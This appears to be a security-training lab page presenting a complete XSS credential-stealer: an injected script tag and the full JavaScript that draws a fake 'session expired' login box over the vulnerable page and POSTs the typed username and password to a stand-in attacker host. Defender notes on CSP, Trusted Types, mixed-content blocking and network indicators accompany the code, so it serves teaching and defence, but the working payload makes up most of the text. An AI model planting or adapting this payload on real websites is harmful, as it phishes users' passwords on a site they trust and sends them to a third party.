AppSec Labs - XSS Credentials Stealer
Example page:
View stolen credentials:
XSS Phishing Payload:
<!--
  Injected tag: pulls cred_stealer.js from a third-party host over plain HTTP.
  Defender notes:
  - It only executes if the page reflects or stores this markup unencoded, so the
    root fix is context-aware output encoding of the vulnerable parameter.
  - A Content-Security-Policy whose script-src omits this host refuses the load.
  - On an HTTPS page, browsers block an http:// script as active mixed content.
-->
<script src="http://online.attacker-site.com/cred_stealer/cred_stealer.js"></script>

Payload Source:
/**
 * Click handler for the Login button of the injected "session expired" dialog.
 *
 * Reads the values typed into #tr_username and #tr_password, POSTs them to a
 * hard-coded endpoint on another origin, then removes the dialog (#aa22) from
 * its wrapper (#aa11) so the underlying page is shown again.
 *
 * Defender notes:
 * - This code runs inside the vulnerable page's origin, so HttpOnly cookies and
 *   same-origin checks do not help; the user types the secret into the page.
 * - CORS does not stop the request: a form-encoded POST is sent without a
 *   preflight, and only reading the response is restricted. A CSP connect-src
 *   that omits the collection host is what blocks it.
 * - Network indicator: a cross-origin POST from an application page whose
 *   form-encoded body carries username= and password= fields.
 */
function handle_login()
{
// Values come from the overlay's own inputs, not from the site's real login form.
var username = document.querySelector("#tr_username").value;
var password = document.querySelector("#tr_password").value;
// Hard-coded collection endpoint on a different origin, reached over plain HTTP.
var target_url = "http://online.attacker-site.com/cred_stealer/cred_stealer.php";
var xhttp = new XMLHttpRequest();
// Third argument true: the request is asynchronous, so the page does not block.
xhttp.open("POST", target_url, true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// withCredentials concerns cookies/auth for the destination origin only;
// it does not forward the vulnerable site's cookies.
xhttp.withCredentials = true;
// Body is built by plain string concatenation of the two field values.
xhttp.send("username="+username+"&password="+password);

// Remove the dialog right after sending; the response is never inspected.
var parent = document.getElementById("aa11");
var child = document.getElementById("aa22");
parent.removeChild(child);
}

// Runs as soon as the script is evaluated: appends a full-viewport grey overlay
// (#greyoutbg) and a centred, fixed-position box (#cred_box) that shows a
// "session expired" message with username/password inputs. The button's inline
// onclick attribute calls handle_login().
//
// Defender notes:
// - `innerHTML +=` serialises and re-parses the whole <body>, so every existing
//   body node is replaced; a MutationObserver on <body> sees this as a mass
//   removal and re-insertion of children.
// - A CSP without 'unsafe-inline' refuses the inline onclick handler, and
//   enforcing Trusted Types (require-trusted-types-for 'script') rejects the
//   string assignment to innerHTML.
// - The prompt appears in-page with no navigation to the application's real
//   login URL, which is worth covering in user-awareness material.
document.body.innerHTML += '<div id="aa11"><div id="aa22"><div id="greyoutbg" style=" opacity: 0.5; background: #000; width: 100%;height: 100%; z-index: 99999999;top: 0; left: 0; position: fixed; "></div><div id="cred_box" style="font-family: Tahoma; background-color:#FFF; position: fixed; width: 500px; top: 50%; left: 50%; margin-top: -180px; margin-left: -250px; z-index: 999999999; box-shadow: 0 0 20px #000; border: 1px solid #000"><div id="error_message" style="width: 400px; margin: 20px auto; background-color: #ff9999; border: 1px solid red; font-weight:bold; padding:10px">Your session has expired, please login again to continue.</div><div id="input_creds" style="width: 400px; margin: 20px auto;"><div style="font-weight:bold; width:100px; display:inline-block">Username:</div><input id="tr_username" style="width: 150px; padding: 5px; margin-bottom: 10px"type="text"><br><div style="font-weight:bold; width:100px; display:inline-block">Password:</div><input id="tr_password" style="width: 150px; padding: 5px; margin-bottom: 10px" type="password"><br><button type="button" onclick="handle_login()" style="margin: 10px 0 0 0; padding:10px 20px; width: 100px">Login</button></div></div></div></div>';